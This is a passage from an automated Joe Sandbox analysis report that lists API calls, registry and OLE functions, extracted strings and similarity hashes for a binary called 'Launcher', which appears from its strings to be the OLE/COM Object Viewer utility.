                                                                                                    • #2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00671B99
                                                                                                    • #3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00671BA6
                                                                                                    • #3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00671BB8
                                                                                                    • wsprintfW.USER32 ref: 00671BE8
                                                                                                    • #5568.MFC42U(000000FF), ref: 00671BF6
                                                                                                    • #6399.MFC42U(?,?,?,000000FF), ref: 00671C09
                                                                                                    • #800.MFC42U(?,?,?,000000FF), ref: 00671C11
                                                                                                    • #800.MFC42U(?,?,?,000000FF), ref: 00671C19
                                                                                                    • #800.MFC42U(?,?,?,000000FF), ref: 00671C21
                                                                                                    Strings
                                                                                                    • ,, xrefs: 00671B70
                                                                                                    • %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, xrefs: 00671BE2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #540#800$#3792#4155$#2910#2970#3865#4493#5568#6399H_prolog3_wsprintf
                                                                                                    • String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,
                                                                                                    • API String ID: 3591584436-2100854449
                                                                                                    • Opcode ID: 0a08a52c9a55812f9f806114a1fdf939d0250c05aabb547e6487044443c50897
                                                                                                    • Instruction ID: 666971a736e69173a527be17fd3ae3311b9bd5d68d3d2cc3f72c00fe3c676cb1
                                                                                                    • Opcode Fuzzy Hash: 0a08a52c9a55812f9f806114a1fdf939d0250c05aabb547e6487044443c50897
                                                                                                    • Instruction Fuzzy Hash: 73315A32900108ABCF45EBE0CC52EEDBB77BF58310F448568F216A71A2DF716A1ACB55
                                                                                                    APIs
                                                                                                    • #1662.MFC42U(800E373A), ref: 00674326
                                                                                                    • #858.MFC42U(?), ref: 00674531
                                                                                                    • #540.MFC42U ref: 0067455F
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00669EDC), ref: 0067459A
                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 006745B1
                                                                                                    • #2810.MFC42U(?,CLSID\%s,?,?), ref: 006745E0
                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 006745F3
                                                                                                    • RegQueryValueW.ADVAPI32(80000000,00000000,?,00000100), ref: 00674618
                                                                                                    • #2810.MFC42U(?,%s (%s),?,?), ref: 00674636
                                                                                                    • #2810.MFC42U(?,0066572C,?,?,00669EDC), ref: 00674651
                                                                                                    • #540.MFC42U(00000000,?), ref: 006746F4
                                                                                                    • #2810.MFC42U(?,Could not add item to tree view. Internal OLEViewer error.,00000000,?), ref: 00674709
                                                                                                    • #800.MFC42U(?,80004005,00000000,?), ref: 0067472C
                                                                                                    • #2644.MFC42U(00000000,?), ref: 00674737
                                                                                                    • #800.MFC42U(00000000,?), ref: 0067476E
                                                                                                    Strings
                                                                                                    • Could not add item to tree view. Internal OLEViewer error., xrefs: 006746FD
                                                                                                    • %s (%s), xrefs: 0067462A
                                                                                                    • CLSID\%s, xrefs: 006745D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2810$#540#800lstrcpy$#1662#2644#858FromQueryStringValue
                                                                                                    • String ID: %s (%s)$CLSID\%s$Could not add item to tree view. Internal OLEViewer error.
                                                                                                    • API String ID: 2368693756-676685266
                                                                                                    • Opcode ID: 5701ff7b78a9e01fabde9c60918994aa489f61fbda2cc2910bdb0fa50e3ef55a
                                                                                                    • Instruction ID: 60cdfe1131faa58fffbc632c5b9258e3fb2238362f4ecbbc5d3bd7392a3d1d73
                                                                                                    • Opcode Fuzzy Hash: 5701ff7b78a9e01fabde9c60918994aa489f61fbda2cc2910bdb0fa50e3ef55a
                                                                                                    • Instruction Fuzzy Hash: EFD1C4719012299FDB65EF54CC99B9DB7BABF48300F1081EAE409A72A1DB709E84CF54
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #4078
                                                                                                    • String ID: Jf$"$0Jf
                                                                                                    • API String ID: 2741252101-3062084776
                                                                                                    • Opcode ID: bff04548c0a4d3e47c7b89f6e324be85e00c69fa853cb4f2afbadfe507114767
                                                                                                    • Instruction ID: f128d06dd218af28dadf16626590379102da63a5d37afe567a5e4ee38b6ea544
                                                                                                    • Opcode Fuzzy Hash: bff04548c0a4d3e47c7b89f6e324be85e00c69fa853cb4f2afbadfe507114767
                                                                                                    • Instruction Fuzzy Hash: C0A12A70D00619EFDF54DFA4D8497ADBBB3EF48311F1091A9E41AA63A0EBB48A41CF11
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066CB20
                                                                                                    • #540.MFC42U(00000264,0066DF79), ref: 0066CB33
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,00000264,0066DF79), ref: 0066CB5F
                                                                                                    • #861.MFC42U(?), ref: 0066CBEC
                                                                                                    • lstrcmpW.KERNEL32(?,Interactive User,?,?,?,?), ref: 0066CC3D
                                                                                                    • #6195.MFC42U(006621A0,?,?,?,?), ref: 0066CC4E
                                                                                                    • #2634.MFC42U(00000000,006621A0,?,?,?,?), ref: 0066CC58
                                                                                                    • #6195.MFC42U(?,?,?,?,?), ref: 0066CC69
                                                                                                    • #2634.MFC42U(00000001,?,?,?,?,?), ref: 0066CC72
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0066CCA3
                                                                                                    • #6330.MFC42U(00000000,?,?,?,?), ref: 0066CCAC
                                                                                                    • #800.MFC42U(00000000,?,?,?,?), ref: 0066CCB7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2634#6195$#540#6330#800#861FromH_prolog3_MessageSendStringlstrcmp
                                                                                                    • String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
                                                                                                    • API String ID: 3025489585-4117267133
                                                                                                    • Opcode ID: a75febd04f8ff8d5aa1ccd49b5a97226a9b4695dcf0bef01a42f3db189251687
                                                                                                    • Instruction ID: 6f73a81ef8dc27efd5e1918865368275c01c30a81b03132a3ec886b5c6a6f2b4
                                                                                                    • Opcode Fuzzy Hash: a75febd04f8ff8d5aa1ccd49b5a97226a9b4695dcf0bef01a42f3db189251687
                                                                                                    • Instruction Fuzzy Hash: 2E41E831504719ABDB51EF24CC86FEB777BAF09700F4141EDB90DAB181DAB26A48CB54
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0067D924
                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0067B9B7,?,00000000,00000000,00000000), ref: 0067D942
                                                                                                    • #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0067D96C
                                                                                                    • #922.MFC42U(?,?,?,?,?,?,?), ref: 0067D97F
                                                                                                    • #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D98C
                                                                                                    • #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D997
                                                                                                    • LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0067D99F
                                                                                                    • #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0067D9AA
                                                                                                    • #540.MFC42U ref: 0067D94F
                                                                                                      • Part of subcall function 0067DCEB: wsprintfW.USER32 ref: 0067DD1D
                                                                                                    • #540.MFC42U ref: 0067D9B7
                                                                                                    • #2810.MFC42U(?,<No system message defined> %s,00000000,?), ref: 0067D9D5
                                                                                                    • #922.MFC42U(?,?,?,?,?,?), ref: 0067D9E8
                                                                                                    • #858.MFC42U(00000000,?,?,?,?,?,?), ref: 0067D9F5
                                                                                                    • #800.MFC42U(00000000,?,?,?,?,?,?), ref: 0067DA01
                                                                                                    • #1197.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0067DA0B
                                                                                                    • #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0067DA13
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#1197#2810#540#858#922$FormatFreeH_prolog3LocalMessagewsprintf
                                                                                                    • String ID: %s %s$<No system message defined> %s
                                                                                                    • API String ID: 3659733580-1395831093
                                                                                                    • Opcode ID: 02150189d4a672d6beb88e83374b9ddf5fc531af8d36bfb1ad6c8e00f7c3c59f
                                                                                                    • Instruction ID: 6400824a66a048d3d5eea24b27d42d728d50d2e8128ef99ac2dc98e61d79e2fd
                                                                                                    • Opcode Fuzzy Hash: 02150189d4a672d6beb88e83374b9ddf5fc531af8d36bfb1ad6c8e00f7c3c59f
                                                                                                    • Instruction Fuzzy Hash: 57310BB180010EAEDF42EBE0CD82DFFBB7EAF24344F108819B50976191EA714A48DB75
                                                                                                    APIs
                                                                                                    • RegOpenKeyW.ADVAPI32(80000000,TypeLib,00000000), ref: 00677402
                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 0067743B
                                                                                                    • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 0067745D
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00677496
                                                                                                    • RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 006774C9
                                                                                                    • CLSIDFromString.OLE32(00000000,-00000008), ref: 00677570
                                                                                                    • wcstol.MSVCRT ref: 00677610
                                                                                                    • wcsrchr.MSVCRT ref: 0067762C
                                                                                                    • wcstol.MSVCRT ref: 00677650
                                                                                                    • wsprintfW.USER32 ref: 00677696
                                                                                                    • wsprintfW.USER32 ref: 006776B9
                                                                                                      • Part of subcall function 00677F0B: SendMessageW.USER32(?,00001132,00000000,RHg), ref: 00677F1D
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00677743
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00677754
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnumOpenwcstolwsprintf$FromMessageQuerySendStringValuewcsrchr
                                                                                                    • String ID: %s (Ver %s)$%s <no name>$'$TypeLib
                                                                                                    • API String ID: 3817488620-1332438793
                                                                                                    • Opcode ID: 318dae813cb33e534b393939e4dedb33edc9f1af6aa9bb5aea731ad71ba583ec
                                                                                                    • Instruction ID: cc8b318ca2e876890abd8b0534728a9acf1ac583ef369577e374b27c6c08202a
                                                                                                    • Opcode Fuzzy Hash: 318dae813cb33e534b393939e4dedb33edc9f1af6aa9bb5aea731ad71ba583ec
                                                                                                    • Instruction Fuzzy Hash: 0BA1E371D082289FDB61DF64CC49BE9B7B9FB08305F1081EAE50DA6250DB78AE84DF45
                                                                                                    APIs
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 0067D152
                                                                                                    • lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0067D163
                                                                                                    • wsprintfW.USER32 ref: 0067D179
                                                                                                    • RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 0067D1AA
                                                                                                    • wsprintfW.USER32 ref: 0067D1CD
                                                                                                      • Part of subcall function 0067D6F5: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,0067D6E4,80000000,?,?,?,?,?), ref: 0067D70D
                                                                                                      • Part of subcall function 0067D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,0067D6E4,?,?,?,0067D6E4,80000000,?,?,?,?,?), ref: 0067D72C
                                                                                                      • Part of subcall function 0067D6F5: RegCloseKey.ADVAPI32(?,?,?,?,0067D6E4,80000000,?,?,?,?,?,?,?,?), ref: 0067D738
                                                                                                    • _wcsicmp.MSVCRT ref: 0067D20E
                                                                                                    • wsprintfW.USER32 ref: 0067D22D
                                                                                                      • Part of subcall function 0067D81B: lstrlenW.KERNEL32(0067D19D,?,80000000,00000000), ref: 0067D846
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 0067D25C
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0067D270
                                                                                                    • wsprintfW.USER32 ref: 0067D286
                                                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 0067D2C0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$CloseOpenlstrcpy$EnumFromQueryStringValue_wcsicmplstrlen
                                                                                                    • String ID: AppID$AppID\%s$CLSID$CLSID\%s$CLSID\%s\LocalServer32$LocalServer32
                                                                                                    • API String ID: 566217164-1287389397
                                                                                                    • Opcode ID: 0b70d44078b271880c0daac3f0e959a59d8c3c754eb21e952a70758704acd4bb
                                                                                                    • Instruction ID: 430f70c9f4b53aff9fd71ee18ea5daa72e8ce6e9df8bf7b9d32435964ec6c56b
                                                                                                    • Opcode Fuzzy Hash: 0b70d44078b271880c0daac3f0e959a59d8c3c754eb21e952a70758704acd4bb
                                                                                                    • Instruction Fuzzy Hash: 9A514F72900119AEDF20EB90DD45EEB77BEEF46300F0045A6BA49E6141DBB09B498FA5
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0066F34D
                                                                                                    • #324.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F35E
                                                                                                    • #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F375
                                                                                                    • #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F38F
                                                                                                    • #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F3AA
                                                                                                    • #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F3C0
                                                                                                    • #567.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F3DA
                                                                                                    • #540.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F3EF
                                                                                                    • #540.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F400
                                                                                                    • #540.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F40F
                                                                                                    • #540.MFC42U(0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F420
                                                                                                    • #861.MFC42U(006621A0,0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F436
                                                                                                    • #861.MFC42U(006621A0,006621A0,0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F442
                                                                                                    • #861.MFC42U(006621A0,006621A0,006621A0,0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F453
                                                                                                    • #861.MFC42U(006621A0,006621A0,006621A0,006621A0,0000008B,00000000,00000008,0066D701,0000007A,00000008,0066D2DA,00000004), ref: 0066F45F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #567$#540#861$#324H_prolog3
                                                                                                    • String ID: g$Pg
                                                                                                    • API String ID: 1167559088-3644887600
                                                                                                    • Opcode ID: 6fc1d1c6da3d12476b7736e87657860933d812633f59e2ed80c1c4a483de7fd3
                                                                                                    • Instruction ID: 2698fed5f838cf7178425cc329bcb08d52279aceb2e89d9663a73621c4ad5be2
                                                                                                    • Opcode Fuzzy Hash: 6fc1d1c6da3d12476b7736e87657860933d812633f59e2ed80c1c4a483de7fd3
                                                                                                    • Instruction Fuzzy Hash: 09319170A00656DBDB55EFA489127DCFBB2AF59300F50848CA5492B383DBB52B08CBD6
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066B73B
                                                                                                    • #538.MFC42U(?), ref: 0066B775
                                                                                                      • Part of subcall function 00674899: #1662.MFC42U ref: 006748D9
                                                                                                      • Part of subcall function 00674899: #540.MFC42U ref: 006748F3
                                                                                                      • Part of subcall function 00674899: lstrcpyW.KERNEL32(?,00000000), ref: 00674912
                                                                                                      • Part of subcall function 00674899: CreateBindCtx.OLE32(00000000,?), ref: 00674936
                                                                                                      • Part of subcall function 00674899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00674971
                                                                                                      • Part of subcall function 00674899: #2644.MFC42U ref: 006749D1
                                                                                                      • Part of subcall function 00674899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 006749E9
                                                                                                      • Part of subcall function 00674899: #800.MFC42U(?,00000000), ref: 00674A19
                                                                                                    • #800.MFC42U(?,?,?), ref: 0066B799
                                                                                                    • #538.MFC42U(?,?,?,?), ref: 0066B7A9
                                                                                                    • #800.MFC42U(?,?,?), ref: 0066B7D1
                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,?,?), ref: 0066B7F1
                                                                                                    • CoCreateInstance.OLE32(?,00000000,?), ref: 0066B824
                                                                                                    • #538.MFC42U(?), ref: 0066B836
                                                                                                    • #540.MFC42U ref: 0066B84A
                                                                                                    • #2810.MFC42U(?,CoCreateInstance failed using the CLSID for '%s',?), ref: 0066B862
                                                                                                      • Part of subcall function 0067D91D: __EH_prolog3.LIBCMT ref: 0067D924
                                                                                                      • Part of subcall function 0067D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0067B9B7,?,00000000,00000000,00000000), ref: 0067D942
                                                                                                      • Part of subcall function 0067D91D: #540.MFC42U ref: 0067D94F
                                                                                                      • Part of subcall function 0067D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0067D96C
                                                                                                      • Part of subcall function 0067D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 0067D97F
                                                                                                      • Part of subcall function 0067D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D98C
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D997
                                                                                                      • Part of subcall function 0067D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0067D99F
                                                                                                      • Part of subcall function 0067D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0067D9AA
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0067DA13
                                                                                                    • #800.MFC42U(?,8007000E), ref: 0066B8F8
                                                                                                    Strings
                                                                                                    • The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file., xrefs: 0066B8DD
                                                                                                    • CoCreateInstance failed using the CLSID for '%s', xrefs: 0066B85C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#2810#538#540$Create$#1197#1662#2644#858#922BindDisplayFormatFreeFromH_prolog3H_prolog3_InstanceLocalMessageNameParseProglstrcpy
                                                                                                    • String ID: CoCreateInstance failed using the CLSID for '%s'$The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
                                                                                                    • API String ID: 2990471804-1967779486
                                                                                                    • Opcode ID: 0fd077e71e2eadaef94d43ef1d189df55d9d2c9a4bafd89cef2d5652abaadc30
                                                                                                    • Instruction ID: 427eec0941fa492e4e5e7e319638091f9f7ebff5d49aed9b915015753069b866
                                                                                                    • Opcode Fuzzy Hash: 0fd077e71e2eadaef94d43ef1d189df55d9d2c9a4bafd89cef2d5652abaadc30
                                                                                                    • Instruction Fuzzy Hash: 5F517D71900219EFCF01EFA0C994DDDBBBAAF48310F144599E915B72A1DB31EE45CB64
                                                                                                    APIs
                                                                                                    • #355.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,800E373A), ref: 006725C2
                                                                                                    • #2507.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,800E373A), ref: 006725D1
                                                                                                    • #800.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,800E373A), ref: 006725E5
                                                                                                    • #3494.MFC42U(?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,800E373A), ref: 0067260E
                                                                                                    • #800.MFC42U(?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,800E373A), ref: 00672679
                                                                                                    • #3494.MFC42U(?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,800E373A), ref: 00672696
                                                                                                    • #800.MFC42U(00000000,?,?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,800E373A), ref: 006726D2
                                                                                                    • #800.MFC42U(?,00000000,AllFiles(*.*)|*.*|,?,800E373A), ref: 00672796
                                                                                                    Strings
                                                                                                    • AllFiles(*.*)|*.*|, xrefs: 006725A9
                                                                                                    • *.*, xrefs: 006725B5
                                                                                                    • IMoniker::BindToObject failed on the file moniker created from ( "%s" )., xrefs: 00672748
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#3494$#2507#355
                                                                                                    • String ID: *.*$AllFiles(*.*)|*.*|$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).
                                                                                                    • API String ID: 539546934-1039925223
                                                                                                    • Opcode ID: 57562f66b0f1e58c5ad69f1c13b2a8b684677b5efefe5d9417e08ba270903326
                                                                                                    • Instruction ID: a29facc811a8030ca1aa9a4a4c034d2737b479d9ff7487b224664cd9b3b0ed5f
                                                                                                    • Opcode Fuzzy Hash: 57562f66b0f1e58c5ad69f1c13b2a8b684677b5efefe5d9417e08ba270903326
                                                                                                    • Instruction Fuzzy Hash: D1511670814668EFCB66DB64CC55BECB7B9BF14700F0481E9A019A72A1EB715F88CF15
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0067110A
                                                                                                    • SetActiveWindow.USER32(?,00000228), ref: 0067111B
                                                                                                    • #2859.MFC42U(00000000), ref: 00671122
                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0067112E
                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00671152
                                                                                                    • #1165.MFC42U ref: 00671158
                                                                                                    • #538.MFC42U(?), ref: 00671187
                                                                                                      • Part of subcall function 00674899: #1662.MFC42U ref: 006748D9
                                                                                                      • Part of subcall function 00674899: #540.MFC42U ref: 006748F3
                                                                                                      • Part of subcall function 00674899: lstrcpyW.KERNEL32(?,00000000), ref: 00674912
                                                                                                      • Part of subcall function 00674899: CreateBindCtx.OLE32(00000000,?), ref: 00674936
                                                                                                      • Part of subcall function 00674899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00674971
                                                                                                      • Part of subcall function 00674899: #2644.MFC42U ref: 006749D1
                                                                                                      • Part of subcall function 00674899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 006749E9
                                                                                                      • Part of subcall function 00674899: #800.MFC42U(?,00000000), ref: 00674A19
                                                                                                    • #800.MFC42U(?,00000000,?), ref: 006711B5
                                                                                                    • #538.MFC42U(?,?,00000000,?), ref: 006711CB
                                                                                                      • Part of subcall function 006742EB: #1662.MFC42U(800E373A), ref: 00674326
                                                                                                    • #800.MFC42U(00000000,?,?,?,00000000,?), ref: 006711F9
                                                                                                    • LoadTypeLib.OLEAUT32(?,00000000), ref: 0067121B
                                                                                                    • #540.MFC42U ref: 00671258
                                                                                                    • #2810.MFC42U(?,The file droped (%s) is not a valid persistent OLE object or Type Library file.,?), ref: 00671277
